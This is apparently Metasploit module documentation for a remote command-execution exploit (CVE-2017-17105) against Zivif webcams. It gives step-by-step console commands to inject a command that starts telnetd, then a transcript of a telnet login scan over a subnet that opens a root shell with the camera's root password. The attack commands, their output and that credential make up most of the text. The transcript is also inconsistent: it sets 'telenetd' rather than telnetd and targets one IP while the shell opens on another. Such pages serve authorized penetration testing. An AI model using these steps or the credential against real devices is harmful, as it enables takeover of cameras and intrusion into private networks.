## Description


  This module exploits a remote command execution vulnerability in Zivif webcams.  This is known to impact versions prior to and including v2.3.4.2103.  Exploit was reported in CVE-2017-17105.  

  This module has been tested successfully on version v2.3.4.2103 and V4.7.4.2121.

## Vulnerable Application

  Unfortunately a virtual copy of this camera is not available.  


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/unix/http/zivif_ipcheck_exec`
  3. Do: `set rhost [IP]`
  4. Do: `set PAYLOAD payload/cmd/unix/generic`
  5. Do: `set CMD telnetd`
  6. Do: `exploit`
  7. Port 23 will now be open on the target


## Scenarios


  ```
  msf5 > use exploit/unix/http/zivif_ipcheck_exec
  msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35
  rhost => 192.168.0.35
  msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic
  PAYLOAD => cmd/unix/generic
  msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd
  CMD => telenetd
  msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit 

  [*] Sending request
  [+] Command sent successfully
  [*] Exploit completed, but no session was created.
  msf5 exploit(unix/http/zivif_ipcheck_exec) > 
  msf5 exploit(unix/http/zivif_ipcheck_exec) > back
  msf5 > use auxiliary/scanner/telnet/telnet_login
  msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24
  RHOSTS => 192.168.0.0/24
  msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds
  USERPASS_FILE => /root/creds
  msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
  threads => 10
  msf5 auxiliary(scanner/telnet/telnet_login) > exploit 

  [!] 192.168.0.34:23          - No active DB -- Credential data will not be saved!
  [+] 192.168.0.34:23          - 192.168.0.34:23 - Login Successful: root:cat1029
  [*] 192.168.0.34:23          - Attempting to start session 192.168.0.34:23 with root:cat1029
  [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.34:23) at 2020-06-15 19:47:14 +0000

  [-] 192.168.0.34:23          - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: )
  [*] 192.168.0.34:23          - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf5 auxiliary(scanner/telnet/telnet_login) > 
  msf5 auxiliary(scanner/telnet/telnet_login) > sessions 

  Active sessions
  ===============

    Id  Name  Type   Information                         Connection
    --  ----  ----   -----------                         ----------
    1         shell  TELNET root:cat1029 (192.168.0.34:23)  0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34)

  msf5 auxiliary(scanner/telnet/telnet_login) > 


  ```



